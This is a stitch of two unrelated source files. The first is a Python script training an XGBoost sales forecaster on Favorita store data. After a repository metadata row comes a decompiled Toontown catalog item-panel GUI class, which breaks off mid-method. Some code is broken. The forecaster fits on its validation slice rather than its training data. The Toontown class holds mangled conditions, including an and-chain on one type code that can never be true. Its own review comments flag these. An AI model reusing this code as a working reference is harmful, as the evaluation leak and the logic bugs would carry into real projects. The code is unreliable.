MODEL_NAME = 'base_xgb'
OUTPUT_FOLDER = 'model_outputs/' + MODEL_NAME
SELECTED_STORES = list(range(1, 55))  # all Favorita store numbers
ONLY_EVALUATE = False  # True: skip training and load the previously saved model

if __name__ == "__main__":
    # --- Load raw data -----------------------------------------------------
    start_time = time.time()
    data = Data()
    end_time = time.time()
    print("Load data in: {} mins.".format((end_time - start_time) / 60))

    # Keep only the selected stores to reduce the dataset size.
    data.train = data.train.loc[data.train.store_nbr.isin(SELECTED_STORES)]

    # --- Feature engineering -----------------------------------------------
    # Calendar features derived from the sale date, stored compactly as int8.
    data.train['month'] = data.train['date'].dt.month
    data.train['week'] = data.train['date'].dt.week
    data.train['day'] = data.train['date'].dt.dayofweek
    data.train['month'] = data.train['month'].astype('int8')
    data.train['week'] = data.train['week'].astype('int8')
    data.train['day'] = data.train['day'].astype('int8')

    # Log-transform the target; non-positive sales (returns) are mapped to 0.
    data.train['unit_sales'] = data.train['unit_sales'].apply(
        lambda u: np.log1p(float(u)) if float(u) > 0 else 0)

    # Merge item metadata (perishable flag, family) onto the sales rows.
    df_full = pd.merge(data.train, data.items[['item_nbr', 'perishable', 'family']],
                       on='item_nbr')
    # Merge weather, oil price and holiday features by date and store.
    df_full = pd.merge(df_full,
                       data.weather_oil_holiday[['date', 'store_nbr', 'is_holiday', 'AvgTemp', 'dcoilwtico_imputed']],
                       on=['date', 'store_nbr'], how='left')
    del df_full['id']
    df_full.rename(columns={'dcoilwtico_imputed': 'oil_price', 'AvgTemp': 'avg_temp'}, inplace=True)

    # --- Train / validation / test split (chronological) --------------------
    df_train = df_full[(df_full['date'] > datetime(2017, 1, 1)) & (df_full['date'] < datetime(2017, 7, 12))]
    df_valid = df_full[(df_full['date'] >= datetime(2017, 7, 12)) & (df_full['date'] < datetime(2017, 7, 31))]
    df_test = df_full[df_full['date'] >= datetime(2017, 7, 31)]

    # Release the large intermediate frames before modeling.
    del data
    del df_full
    gc.collect()

    # --- Modeling ------------------------------------------------------------
    feature_columns = ['store_nbr', 'item_nbr', 'onpromotion', 'month', 'week', 'day', 'perishable', 'is_holiday',
                       'avg_temp', 'oil_price']
    target_column = ['unit_sales']

    X_train, Y_train = df_train[feature_columns], df_train[target_column]
    X_valid, Y_valid = df_valid[feature_columns], df_valid[target_column]
    X_test, Y_test = df_test[feature_columns], df_test[target_column]
    print('Training dataset: {}'.format(X_train.shape))
    print('Testing dataset: {}'.format(X_test.shape))

    if not ONLY_EVALUATE:
        # Default (untuned) XGBoost regressor.
        model_xgr_1 = XGBRegressor()
        start_time = time.time()
        # NOTE(review): this fits on the *validation* slice, not X_train/Y_train.
        # Possibly a deliberate shortcut to keep training fast - confirm intent.
        model_xgr_1.fit(X_valid, Y_valid)
        end_time = time.time()
        print("Model Train time: {} mins.".format((end_time - start_time) / 60))
        # Persist the underlying booster to disk.
        model_xgr_1._Booster.save_model(OUTPUT_FOLDER + '.model')
    else:
        # Bug fix: the original `Booster().load_model(path)` bound None
        # (load_model mutates in place and returns None), so prediction
        # crashed.  Loading into an XGBRegressor restores a model whose
        # .predict() accepts a DataFrame, matching the training path.
        model_xgr_1 = XGBRegressor()
        model_xgr_1.load_model(OUTPUT_FOLDER + '.model')

    Y_pred = model_xgr_1.predict(X_test)

    # Invert the log1p transform; clip predictions to a sane non-negative range.
    Y_pred_antilog = np.clip(np.expm1(Y_pred), 0, 1000)
    Y_test_antilog = np.expm1(Y_test)

    # --- Evaluation ----------------------------------------------------------
    # Perishable items get 25% extra weight, per the competition metric.
    weights = X_test["perishable"].values * 0.25 + 1
    evaluator = Evaluator()  # renamed from 'eval' to avoid shadowing the builtin
    error_data = []
    columns = ['Target unit', 'Data split', 'MSE', 'RMSE', 'NWRMSLE', 'MAE', 'MAPE']
    mse_val_lg, rmse_val_lg, nwrmsle_val_lg, mae_val_lg, mape_val_lg = evaluator.get_error(weights, Y_test, Y_pred, 1)
    mse_val, rmse_val, nwrmsle_val, mae_val, mape_val = evaluator.get_error(weights, Y_test_antilog, Y_pred_antilog, 1)
    error_data.append(['Log', 'Test', mse_val_lg, rmse_val_lg, nwrmsle_val_lg, mae_val_lg, mape_val_lg])
    error_data.append(['Unit', 'Test', mse_val, rmse_val, nwrmsle_val, mae_val, mape_val])
    pd.DataFrame(error_data, columns=columns).to_csv(OUTPUT_FOLDER + '_evaluation.csv', index=False)
| [
"[email protected]"
] | |
a3da9504f28fd24a09d5a381d01999f1ecc2ed4b | 7949f96ee7feeaa163608dbd256b0b76d1b89258 | /toontown/catalog/CatalogItemPanel.py | eec5dcc756b6e374f53146c1236fb2ebf461b5a8 | [] | no_license | xxdecryptionxx/ToontownOnline | 414619744b4c40588f9a86c8e01cb951ffe53e2d | e6c20e6ce56f2320217f2ddde8f632a63848bd6b | refs/heads/master | 2021-01-11T03:08:59.934044 | 2018-07-27T01:26:21 | 2018-07-27T01:26:21 | 71,086,644 | 8 | 10 | null | 2018-06-01T00:13:34 | 2016-10-17T00:39:41 | Python | UTF-8 | Python | false | false | 29,895 | py | # File: t (Python 2.4)
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from toontown.toonbase import ToontownGlobals
from toontown.toontowngui import TTDialog
from toontown.toonbase import TTLocalizer
import CatalogItemTypes
import CatalogItem
from CatalogWallpaperItem import getAllWallpapers
from CatalogFlooringItem import getAllFloorings
from CatalogMouldingItem import getAllMouldings
from CatalogWainscotingItem import getAllWainscotings
from CatalogFurnitureItem import getAllFurnitures
from CatalogFurnitureItem import FLTrunk
from toontown.toontowngui.TeaserPanel import TeaserPanel
from otp.otpbase import OTPGlobals
from direct.directnotify import DirectNotifyGlobal
CATALOG_PANEL_WORDWRAP = 10
CATALOG_PANEL_CHAT_WORDWRAP = 9
CATALOG_PANEL_ACCESSORY_WORDWRAP = 11
class CatalogItemPanel(DirectFrame):
    """One item panel on the Toontown catalog screen.

    Shows the item's picture (cycling through pattern/colour variants where
    the item supports customization), its type/name/price labels, and the
    Buy / Gift / sound-preview buttons.  Construction is cheap; the actual
    GUI is built lazily in load() and torn down in unload().

    NOTE(review): this file appears to be decompiler output ("# File: t
    (Python 2.4)" header), so some boolean expressions below look mangled.
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('CatalogItemPanel')
    def __init__(self, parent = aspect2d, parentCatalogScreen = None, **kw):
        # 'item' (the CatalogItem) and 'type' (catalog type) are init-only options.
        optiondefs = (('item', None, DGG.INITOPT), ('type', CatalogItem.CatalogTypeUnspecified, DGG.INITOPT), ('relief', None, None))
        self.parentCatalogScreen = parentCatalogScreen
        self.defineoptions(kw, optiondefs)
        DirectFrame.__init__(self, parent)
        # GUI is not built yet; load() sets this to 1.
        self.loaded = 0
        self.initialiseoptions(CatalogItemPanel)
    def load(self):
        """Build the panel GUI (picture, labels, buttons); idempotent."""
        if self.loaded:
            return None
        self.loaded = 1
        self.verify = None
        self.pictureFrame = self.attachNewNode('pictureFrame')
        self.pictureFrame.setScale(0.14999999999999999)
        self.itemIndex = 0
        self.ival = None
        typeCode = self['item'].getTypeCode()
        if self['item'].needsCustomize():
            # NOTE(review): this and-chain on a single typeCode looks like a
            # decompilation artifact of what was presumably an or-chain /
            # membership test - confirm against the original source.
            if typeCode == CatalogItemTypes.WALLPAPER_ITEM and typeCode == CatalogItemTypes.FLOORING_ITEM and typeCode == CatalogItemTypes.MOULDING_ITEM and typeCode == CatalogItemTypes.FURNITURE_ITEM and typeCode == CatalogItemTypes.WAINSCOTING_ITEM or typeCode == CatalogItemTypes.TOON_STATUE_ITEM:
                # Collect every variant of this item (same pattern, different colours).
                if typeCode == CatalogItemTypes.WALLPAPER_ITEM:
                    self.items = getAllWallpapers(self['item'].patternIndex)
                elif typeCode == CatalogItemTypes.FLOORING_ITEM:
                    self.items = getAllFloorings(self['item'].patternIndex)
                elif typeCode == CatalogItemTypes.MOULDING_ITEM:
                    self.items = getAllMouldings(self['item'].patternIndex)
                elif typeCode == CatalogItemTypes.FURNITURE_ITEM:
                    self.items = getAllFurnitures(self['item'].furnitureType)
                elif typeCode == CatalogItemTypes.TOON_STATUE_ITEM:
                    self.items = self['item'].getAllToonStatues()
                elif typeCode == CatalogItemTypes.WAINSCOTING_ITEM:
                    self.items = getAllWainscotings(self['item'].patternIndex)
            self.numItems = len(self.items)
            if self.numItems > 1:
                # Arrow buttons to page through the variants.
                guiItems = loader.loadModel('phase_5.5/models/gui/catalog_gui')
                nextUp = guiItems.find('**/arrow_up')
                nextRollover = guiItems.find('**/arrow_Rollover')
                nextDown = guiItems.find('**/arrow_Down')
                prevUp = guiItems.find('**/arrowUp')
                prevDown = guiItems.find('**/arrowDown1')
                prevRollover = guiItems.find('**/arrowRollover')
                self.nextVariant = DirectButton(parent = self, relief = None, image = (nextUp, nextDown, nextRollover, nextUp), image3_color = (1, 1, 1, 0.40000000000000002), pos = (0.13, 0, 0), command = self.showNextVariant)
                self.prevVariant = DirectButton(parent = self, relief = None, image = (prevUp, prevDown, prevRollover, prevUp), image3_color = (1, 1, 1, 0.40000000000000002), pos = (-0.13, 0, 0), command = self.showPrevVariant, state = DGG.DISABLED)
                # Lazily-filled cache of (picture, interval) per variant.
                self.variantPictures = [
                    (None, None)] * self.numItems
            else:
                self.variantPictures = [
                    (None, None)]
            self.showCurrentVariant()
        else:
            # Non-customizable item: single picture, no variant arrows.
            (picture, self.ival) = self['item'].getPicture(base.localAvatar)
            if picture:
                picture.reparentTo(self)
                picture.setScale(0.14999999999999999)
            self.items = [
                self['item']]
            self.variantPictures = [
                (picture, self.ival)]
        self.typeLabel = DirectLabel(parent = self, relief = None, pos = (0, 0, 0.23999999999999999), scale = TTLocalizer.CIPtypeLabel, text = self['item'].getTypeName(), text_fg = (0.94999999999999996, 0.94999999999999996, 0, 1), text_shadow = (0, 0, 0, 1), text_font = ToontownGlobals.getInterfaceFont(), text_wordwrap = CATALOG_PANEL_WORDWRAP)
        # Slanted status text ("On Order", "Purchased", ...) next to the picture.
        self.auxText = DirectLabel(parent = self, relief = None, scale = 0.050000000000000003, pos = (-0.20000000000000001, 0, 0.16))
        self.auxText.setHpr(0, 0, -30)
        self.nameLabel = DirectLabel(parent = self, relief = None, text = self['item'].getDisplayName(), text_fg = (0, 0, 0, 1), text_font = ToontownGlobals.getInterfaceFont(), text_scale = TTLocalizer.CIPnameLabel, text_wordwrap = CATALOG_PANEL_WORDWRAP + TTLocalizer.CIPwordwrapOffset)
        # Position/scale of the name depends on the item type and line count.
        if self['item'].getTypeCode() == CatalogItemTypes.CHAT_ITEM:
            self.nameLabel['text_wordwrap'] = CATALOG_PANEL_CHAT_WORDWRAP
            numRows = self.nameLabel.component('text0').textNode.getNumRows()
            if numRows == 1:
                namePos = (0, 0, -0.059999999999999998)
            elif numRows == 2:
                namePos = (0, 0, -0.029999999999999999)
            else:
                namePos = (0, 0, 0)
            nameScale = 0.063
        elif self['item'].getTypeCode() == CatalogItemTypes.ACCESSORY_ITEM:
            self.nameLabel['text_wordwrap'] = CATALOG_PANEL_ACCESSORY_WORDWRAP
            namePos = (0, 0, -0.22)
            nameScale = 0.059999999999999998
        else:
            namePos = (0, 0, -0.22)
            nameScale = 0.059999999999999998
        self.nameLabel.setPos(*namePos)
        self.nameLabel.setScale(nameScale)
        # Jellybean price label (sale items get a prefix and a smaller scale).
        numericBeanPrice = self['item'].getPrice(self['type'])
        priceStr = str(numericBeanPrice) + ' ' + TTLocalizer.CatalogCurrency
        priceScale = 0.070000000000000007
        if self['item'].isSaleItem():
            priceStr = TTLocalizer.CatalogSaleItem + priceStr
            priceScale = 0.059999999999999998
        self.priceLabel = DirectLabel(parent = self, relief = None, pos = (0, 0, -0.29999999999999999), scale = priceScale, text = priceStr, text_fg = (0.94999999999999996, 0.94999999999999996, 0, 1), text_shadow = (0, 0, 0, 1), text_font = ToontownGlobals.getSignFont(), text_align = TextNode.ACenter)
        self.createEmblemPrices(numericBeanPrice)
        buttonModels = loader.loadModel('phase_3.5/models/gui/inventory_gui')
        upButton = buttonModels.find('**/InventoryButtonUp')
        downButton = buttonModels.find('**/InventoryButtonDown')
        rolloverButton = buttonModels.find('**/InventoryButtonRollover')
        buyText = TTLocalizer.CatalogBuyText
        buyTextScale = TTLocalizer.CIPbuyButton
        if self['item'].isRental():
            buyText = TTLocalizer.CatalogRentText
        self.buyButton = DirectButton(parent = self, relief = None, pos = (0.20000000000000001, 0, 0.14999999999999999), scale = (0.69999999999999996, 1, 0.80000000000000004), text = buyText, text_scale = buyTextScale, text_pos = (-0.0050000000000000001, -0.01), image = (upButton, downButton, rolloverButton, upButton), image_color = (1.0, 0.20000000000000001, 0.20000000000000001, 1), image0_color = Vec4(1.0, 0.40000000000000002, 0.40000000000000002, 1), image3_color = Vec4(1.0, 0.40000000000000002, 0.40000000000000002, 0.40000000000000002), command = self._CatalogItemPanel__handlePurchaseRequest)
        # Sound preview toggle buttons (only shown for audio items elsewhere).
        soundIcons = loader.loadModel('phase_5.5/models/gui/catalogSoundIcons')
        soundOn = soundIcons.find('**/sound07')
        soundOff = soundIcons.find('**/sound08')
        self.soundOnButton = DirectButton(parent = self, relief = None, pos = (0.20000000000000001, 0, -0.14999999999999999), scale = (0.69999999999999996, 1, 0.80000000000000004), text_scale = buyTextScale, text_pos = (-0.0050000000000000001, -0.01), image = (upButton, downButton, rolloverButton, upButton), image_color = (0.20000000000000001, 0.5, 0.20000000000000001, 1), image0_color = Vec4(0.40000000000000002, 0.5, 0.40000000000000002, 1), image3_color = Vec4(0.40000000000000002, 0.5, 0.40000000000000002, 0.40000000000000002), command = self.handleSoundOnButton)
        self.soundOnButton.hide()
        soundOn.setScale(0.10000000000000001)
        soundOn.reparentTo(self.soundOnButton)
        self.soundOffButton = DirectButton(parent = self, relief = None, pos = (0.20000000000000001, 0, -0.14999999999999999), scale = (0.69999999999999996, 1, 0.80000000000000004), text_scale = buyTextScale, text_pos = (-0.0050000000000000001, -0.01), image = (upButton, downButton, rolloverButton, upButton), image_color = (0.20000000000000001, 1.0, 0.20000000000000001, 1), image0_color = Vec4(0.40000000000000002, 1.0, 0.40000000000000002, 1), image3_color = Vec4(0.40000000000000002, 1.0, 0.40000000000000002, 0.40000000000000002), command = self.handleSoundOffButton)
        self.soundOffButton.hide()
        soundOff = self.soundOffButton.attachNewNode('soundOff')
        soundOn.copyTo(soundOff)
        soundOff.reparentTo(self.soundOffButton)
        upGButton = buttonModels.find('**/InventoryButtonUp')
        downGButton = buttonModels.find('**/InventoryButtonDown')
        rolloverGButton = buttonModels.find('**/InventoryButtonRollover')
        self.giftButton = DirectButton(parent = self, relief = None, pos = (0.20000000000000001, 0, 0.14999999999999999), scale = (0.69999999999999996, 1, 0.80000000000000004), text = TTLocalizer.CatalogGiftText, text_scale = buyTextScale, text_pos = (-0.0050000000000000001, -0.01), image = (upButton, downButton, rolloverButton, upButton), image_color = (1.0, 0.20000000000000001, 0.20000000000000001, 1), image0_color = Vec4(1.0, 0.40000000000000002, 0.40000000000000002, 1), image3_color = Vec4(1.0, 0.40000000000000002, 0.40000000000000002, 0.40000000000000002), command = self._CatalogItemPanel__handleGiftRequest)
        self.updateButtons()
    def createEmblemPrices(self, numericBeanPrice):
        """Replace the plain bean price with bean/silver/gold emblem icons
        when the item carries emblem prices; lays out 1-3 price labels."""
        priceScale = 0.070000000000000007
        emblemPrices = self['item'].getEmblemPrices()
        if emblemPrices:
            if numericBeanPrice:
                self.priceLabel.hide()
                beanModel = loader.loadModel('phase_5.5/models/estate/jellyBean')
                beanModel.setColorScale(1, 0, 0, 1)
                self.beanPriceLabel = DirectLabel(parent = self, relief = None, pos = (0, 0, -0.29999999999999999), scale = priceScale, image = beanModel, image_pos = (-0.40000000000000002, 0, 0.40000000000000002), text = str(numericBeanPrice), text_fg = (0.94999999999999996, 0.94999999999999996, 0, 1), text_shadow = (0, 0, 0, 1), text_font = ToontownGlobals.getSignFont(), text_align = TextNode.ALeft)
            else:
                self.priceLabel.hide()
            goldPrice = 0
            silverPrice = 0
            emblemIcon = loader.loadModel('phase_3.5/models/gui/tt_m_gui_gen_emblemIcons')
            silverModel = emblemIcon.find('**/tt_t_gui_gen_emblemSilver')
            goldModel = emblemIcon.find('**/tt_t_gui_gen_emblemGold')
            if ToontownGlobals.EmblemTypes.Silver < len(emblemPrices):
                silverPrice = emblemPrices[ToontownGlobals.EmblemTypes.Silver]
                if silverPrice:
                    self.silverPriceLabel = DirectLabel(parent = self, relief = None, pos = (0, 0, -0.29999999999999999), scale = priceScale, image = silverModel, image_pos = (-0.40000000000000002, 0, 0.40000000000000002), text = str(silverPrice), text_fg = (0.94999999999999996, 0.94999999999999996, 0, 1), text_shadow = (0, 0, 0, 1), text_font = ToontownGlobals.getSignFont(), text_align = TextNode.ALeft)
            if ToontownGlobals.EmblemTypes.Gold < len(emblemPrices):
                goldPrice = emblemPrices[ToontownGlobals.EmblemTypes.Gold]
                if goldPrice:
                    self.goldPriceLabel = DirectLabel(parent = self, relief = None, pos = (0, 0, -0.29999999999999999), scale = priceScale, image = goldModel, image_pos = (-0.40000000000000002, 0, 0.40000000000000002), text = str(goldPrice), text_fg = (0.94999999999999996, 0.94999999999999996, 0, 1), text_shadow = (0, 0, 0, 1), text_font = ToontownGlobals.getSignFont(), text_align = TextNode.ALeft)
            # Spread the visible price labels horizontally.
            numPrices = 0
            if numericBeanPrice:
                numPrices += 1
            if silverPrice:
                numPrices += 1
            if goldPrice:
                numPrices += 1
            if numPrices == 2:
                if not numericBeanPrice:
                    self.silverPriceLabel.setX(-0.14999999999999999)
                    self.goldPriceLabel.setX(0.14999999999999999)
                if not silverPrice:
                    self.goldPriceLabel.setX(-0.14999999999999999)
                    self.beanPriceLabel.setX(0.14999999999999999)
                if not goldPrice:
                    self.silverPriceLabel.setX(-0.14999999999999999)
                    self.beanPriceLabel.setX(0.14999999999999999)
            elif numPrices == 3:
                self.silverPriceLabel.setX(-0.20000000000000001)
                self.goldPriceLabel.setX(0)
                self.beanPriceLabel.setX(0.14999999999999999)
    def showNextVariant(self):
        """Advance to the next variant picture, clamping at the last one."""
        messenger.send('wakeup')
        self.hideCurrentVariant()
        self.itemIndex += 1
        if self.itemIndex >= self.numItems - 1:
            self.itemIndex = self.numItems - 1
            self.nextVariant['state'] = DGG.DISABLED
        else:
            self.nextVariant['state'] = DGG.NORMAL
        self.prevVariant['state'] = DGG.NORMAL
        self.showCurrentVariant()
    def showPrevVariant(self):
        """Step back to the previous variant picture, clamping at the first."""
        messenger.send('wakeup')
        self.hideCurrentVariant()
        self.itemIndex -= 1
        if self.itemIndex < 0:
            self.itemIndex = 0
            self.prevVariant['state'] = DGG.DISABLED
        else:
            self.prevVariant['state'] = DGG.NORMAL
        self.nextVariant['state'] = DGG.NORMAL
        self.showCurrentVariant()
    def showCurrentVariant(self):
        """Attach (building lazily if needed) the picture for itemIndex."""
        (newPic, self.ival) = self.variantPictures[self.itemIndex]
        if self.ival:
            self.ival.finish()
        if not newPic:
            # Picture not cached yet: render it now and remember it.
            variant = self.items[self.itemIndex]
            (newPic, self.ival) = variant.getPicture(base.localAvatar)
            self.variantPictures[self.itemIndex] = (newPic, self.ival)
        newPic.reparentTo(self.pictureFrame)
        if self.ival:
            self.ival.loop()
        if self['item'].getTypeCode() == CatalogItemTypes.TOON_STATUE_ITEM:
            # Toon statues also rename the label and track the selected pose.
            if hasattr(self, 'nameLabel'):
                self.nameLabel['text'] = self.items[self.itemIndex].getDisplayName()
            self['item'].gardenIndex = self.items[self.itemIndex].gardenIndex
    def hideCurrentVariant(self):
        """Detach the currently shown variant picture (kept cached)."""
        currentPic = self.variantPictures[self.itemIndex][0]
        if currentPic:
            currentPic.detachNode()
    def unload(self):
        """Tear down everything load() built; safe to call when not loaded."""
        if not self.loaded:
            DirectFrame.destroy(self)
            return None
        self.loaded = 0
        if self['item'].getTypeCode() == CatalogItemTypes.TOON_STATUE_ITEM:
            self['item'].deleteAllToonStatues()
            self['item'].gardenIndex = self['item'].startPoseIndex
            self.nameLabel['text'] = self['item'].getDisplayName()
        self['item'].requestPurchaseCleanup()
        for (picture, ival) in self.variantPictures:
            if picture:
                picture.destroy()
            if ival:
                ival.finish()
                continue
        self.variantPictures = None
        if self.ival:
            self.ival.finish()
            self.ival = None
        if len(self.items):
            self.items[0].cleanupPicture()
        self.pictureFrame.remove()
        self.pictureFrame = None
        self.items = []
        if self.verify:
            self.verify.cleanup()
        DirectFrame.destroy(self)
    def destroy(self):
        """DirectGUI destroy hook: drop the screen backref and unload."""
        self.parentCatalogScreen = None
        self.unload()
    def getTeaserPanel(self):
        """Return a zero-arg callable that pops the pay-wall teaser panel
        for this item's category (used as a button command for free users)."""
        typeName = self['item'].getTypeName()
        if typeName == TTLocalizer.EmoteTypeName or typeName == TTLocalizer.ChatTypeName:
            page = 'emotions'
        elif typeName == TTLocalizer.GardenTypeName or typeName == TTLocalizer.GardenStarterTypeName:
            page = 'gardening'
        else:
            page = 'clothing'
        def showTeaserPanel():
            TeaserPanel(pageName = page)
        return showTeaserPanel
    def updateBuyButton(self):
        """Enable/disable the Buy button and set the aux status text based
        on funds, purchase limits, ownership and item-specific rules."""
        if not self.loaded:
            return None
        if not base.cr.isPaid():
            # Free players get the teaser panel instead of a real purchase.
            self.buyButton['command'] = self.getTeaserPanel()
        self.buyButton.show()
        typeCode = self['item'].getTypeCode()
        orderCount = base.localAvatar.onOrder.count(self['item'])
        if orderCount > 0:
            if orderCount > 1:
                auxText = '%d %s' % (orderCount, TTLocalizer.CatalogOnOrderText)
            else:
                auxText = TTLocalizer.CatalogOnOrderText
        else:
            auxText = ''
        isNameTag = typeCode == CatalogItemTypes.NAMETAG_ITEM
        if isNameTag and not (localAvatar.getGameAccess() == OTPGlobals.AccessFull):
            # Nametag rules for non-full-access players.
            if self['item'].nametagStyle == 100:
                if localAvatar.getFont() == ToontownGlobals.getToonFont():
                    auxText = TTLocalizer.CatalogCurrent
                    self.buyButton['state'] = DGG.DISABLED
            elif self['item'].getPrice(self['type']) > base.localAvatar.getMoney() + base.localAvatar.getBankMoney():
                self.buyButton['state'] = DGG.DISABLED
        elif isNameTag and self['item'].nametagStyle == localAvatar.getNametagStyle():
            auxText = TTLocalizer.CatalogCurrent
            self.buyButton['state'] = DGG.DISABLED
        elif self['item'].reachedPurchaseLimit(base.localAvatar):
            max = self['item'].getPurchaseLimit()
            if max <= 1:
                auxText = TTLocalizer.CatalogPurchasedText
                if self['item'].hasBeenGifted(base.localAvatar):
                    auxText = TTLocalizer.CatalogGiftedText
            else:
                auxText = TTLocalizer.CatalogPurchasedMaxText
            self.buyButton['state'] = DGG.DISABLED
        elif hasattr(self['item'], 'noGarden') and self['item'].noGarden(base.localAvatar):
            auxText = TTLocalizer.NoGarden
            self.buyButton['state'] = DGG.DISABLED
        elif hasattr(self['item'], 'isSkillTooLow') and self['item'].isSkillTooLow(base.localAvatar):
            auxText = TTLocalizer.SkillTooLow
            self.buyButton['state'] = DGG.DISABLED
        elif hasattr(self['item'], 'getDaysToGo') and self['item'].getDaysToGo(base.localAvatar):
            auxText = TTLocalizer.DaysToGo % self['item'].getDaysToGo(base.localAvatar)
            self.buyButton['state'] = DGG.DISABLED
        elif self['item'].getEmblemPrices() and not base.localAvatar.isEnoughMoneyAndEmblemsToBuy(self['item'].getPrice(self['type']), self['item'].getEmblemPrices()):
            self.buyButton['state'] = DGG.DISABLED
        elif self['item'].getPrice(self['type']) <= base.localAvatar.getMoney() + base.localAvatar.getBankMoney():
            self.buyButton['state'] = DGG.NORMAL
            self.buyButton.show()
        else:
            self.buyButton['state'] = DGG.DISABLED
            self.buyButton.show()
        self.auxText['text'] = auxText
    def _CatalogItemPanel__handlePurchaseRequest(self):
        """Pop a confirmation dialog with wording that matches the item's
        price type (replacement, rental, bean and/or emblem prices)."""
        if self['item'].replacesExisting() and self['item'].hasExisting():
            if self['item'].getFlags() & FLTrunk:
                message = TTLocalizer.CatalogVerifyPurchase % {
                    'item': self['item'].getName(),
                    'price': self['item'].getPrice(self['type']) }
            else:
                message = TTLocalizer.CatalogOnlyOnePurchase % {
                    'old': self['item'].getYourOldDesc(),
                    'item': self['item'].getName(),
                    'price': self['item'].getPrice(self['type']) }
        elif self['item'].isRental():
            message = TTLocalizer.CatalogVerifyRent % {
                'item': self['item'].getName(),
                'price': self['item'].getPrice(self['type']) }
        else:
            emblemPrices = self['item'].getEmblemPrices()
            if emblemPrices:
                # Pick the message variant matching the combination of
                # bean / silver-emblem / gold-emblem prices that apply.
                silver = emblemPrices[ToontownGlobals.EmblemTypes.Silver]
                gold = emblemPrices[ToontownGlobals.EmblemTypes.Gold]
                price = self['item'].getPrice(self['type'])
                if price and silver and gold:
                    message = TTLocalizer.CatalogVerifyPurchaseBeanSilverGold % {
                        'item': self['item'].getName(),
                        'price': self['item'].getPrice(self['type']),
                        'silver': silver,
                        'gold': gold }
                elif price and silver:
                    message = TTLocalizer.CatalogVerifyPurchaseBeanSilver % {
                        'item': self['item'].getName(),
                        'price': self['item'].getPrice(self['type']),
                        'silver': silver,
                        'gold': gold }
                elif price and gold:
                    message = TTLocalizer.CatalogVerifyPurchaseBeanGold % {
                        'item': self['item'].getName(),
                        'price': self['item'].getPrice(self['type']),
                        'silver': silver,
                        'gold': gold }
                elif silver and gold:
                    message = TTLocalizer.CatalogVerifyPurchaseSilverGold % {
                        'item': self['item'].getName(),
                        'price': self['item'].getPrice(self['type']),
                        'silver': silver,
                        'gold': gold }
                elif silver:
                    message = TTLocalizer.CatalogVerifyPurchaseSilver % {
                        'item': self['item'].getName(),
                        'price': self['item'].getPrice(self['type']),
                        'silver': silver,
                        'gold': gold }
                elif gold:
                    message = TTLocalizer.CatalogVerifyPurchaseGold % {
                        'item': self['item'].getName(),
                        'price': self['item'].getPrice(self['type']),
                        'silver': silver,
                        'gold': gold }
                else:
                    self.notify.warning('is this a completely free item %s?' % self['item'].getName())
                    message = TTLocalizer.CatalogVerifyPurchase % {
                        'item': self['item'].getName(),
                        'price': self['item'].getPrice(self['type']) }
            else:
                message = TTLocalizer.CatalogVerifyPurchase % {
                    'item': self['item'].getName(),
                    'price': self['item'].getPrice(self['type']) }
        self.verify = TTDialog.TTGlobalDialog(doneEvent = 'verifyDone', message = message, style = TTDialog.TwoChoice)
        self.verify.show()
        self.accept('verifyDone', self._CatalogItemPanel__handleVerifyPurchase)
    def _CatalogItemPanel__handleVerifyPurchase(self):
        """Confirmation-dialog callback: fire the purchase request if OK'd."""
        if base.config.GetBool('want-qa-regression', 0):
            self.notify.info('QA-REGRESSION: CATALOG: Order item')
        status = self.verify.doneStatus
        self.ignore('verifyDone')
        self.verify.cleanup()
        del self.verify
        self.verify = None
        if status == 'ok':
            item = self.items[self.itemIndex]
            messenger.send('CatalogItemPurchaseRequest', [
                item])
            self.buyButton['state'] = DGG.DISABLED
    def _CatalogItemPanel__handleGiftRequest(self):
        """Pop a confirmation dialog for gifting to the selected friend."""
        if self['item'].replacesExisting() and self['item'].hasExisting():
            message = TTLocalizer.CatalogOnlyOnePurchase % {
                'old': self['item'].getYourOldDesc(),
                'item': self['item'].getName(),
                'price': self['item'].getPrice(self['type']) }
        else:
            friendIndex = self.parentCatalogScreen.friendGiftIndex
            friendText = 'Error'
            numFriends = len(base.localAvatar.friendsList) + len(base.cr.avList) - 1
            if numFriends > 0:
                friendText = self.parentCatalogScreen.receiverName
            message = TTLocalizer.CatalogVerifyGift % {
                'item': self['item'].getName(),
                'price': self['item'].getPrice(self['type']),
                'friend': friendText }
        self.verify = TTDialog.TTGlobalDialog(doneEvent = 'verifyGiftDone', message = message, style = TTDialog.TwoChoice)
        self.verify.show()
        self.accept('verifyGiftDone', self._CatalogItemPanel__handleVerifyGift)
    def _CatalogItemPanel__handleVerifyGift(self):
        """Gift-dialog callback: fire the gift purchase request if OK'd."""
        if base.config.GetBool('want-qa-regression', 0):
            self.notify.info('QA-REGRESSION: CATALOG: Gift item')
        status = self.verify.doneStatus
        self.ignore('verifyGiftDone')
        self.verify.cleanup()
        del self.verify
        self.verify = None
        if status == 'ok':
            self.giftButton['state'] = DGG.DISABLED
            item = self.items[self.itemIndex]
            messenger.send('CatalogItemGiftPurchaseRequest', [
                item])
    def updateButtons(self, giftActivate = 0):
        """Show either the Buy or the Gift button depending on whether the
        parent screen is in gifting mode."""
        if self.parentCatalogScreen.gifting == -1:
            self.updateBuyButton()
            if self.loaded:
                self.giftButton.hide()
        else:
            self.updateGiftButton(giftActivate)
            if self.loaded:
                self.buyButton.hide()
    def updateGiftButton(self, giftUpdate = 0):
        """Enable/disable the Gift button against the selected receiver's
        state (giftability, fit, purchase limit, mailbox space, funds)."""
        if not self.loaded:
            return None
        self.giftButton.show()
        if giftUpdate == 0:
            return None
        if not base.cr.isPaid():
            self.giftButton['command'] = self.getTeaserPanel()
        self.auxText['text'] = ' '
        numFriends = len(base.localAvatar.friendsList) + len(base.cr.avList) - 1
        if numFriends > 0:
            self.giftButton['state'] = DGG.DISABLED
            self.giftButton.show()
            auxText = ' '
            if self['item'].isGift() <= 0:
                self.giftButton.show()
                self.giftButton['state'] = DGG.DISABLED
                auxText = TTLocalizer.CatalogNotAGift
                self.auxText['text'] = auxText
                return None
            elif self.parentCatalogScreen.gotAvatar == 1:
                avatar = self.parentCatalogScreen.giftAvatar
                # NOTE(review): this gender/fit expression looks like a
                # mangled decompilation of a boys-only/girls-only check -
                # confirm against the original source before relying on it.
                if (self['item'].forBoysOnly() or avatar.getStyle().getGender() == 'f' or self['item'].forGirlsOnly()) and avatar.getStyle().getGender() == 'm':
                    self.giftButton.show()
                    self.giftButton['state'] = DGG.DISABLED
                    auxText = TTLocalizer.CatalogNoFit
                    self.auxText['text'] = auxText
                    return None
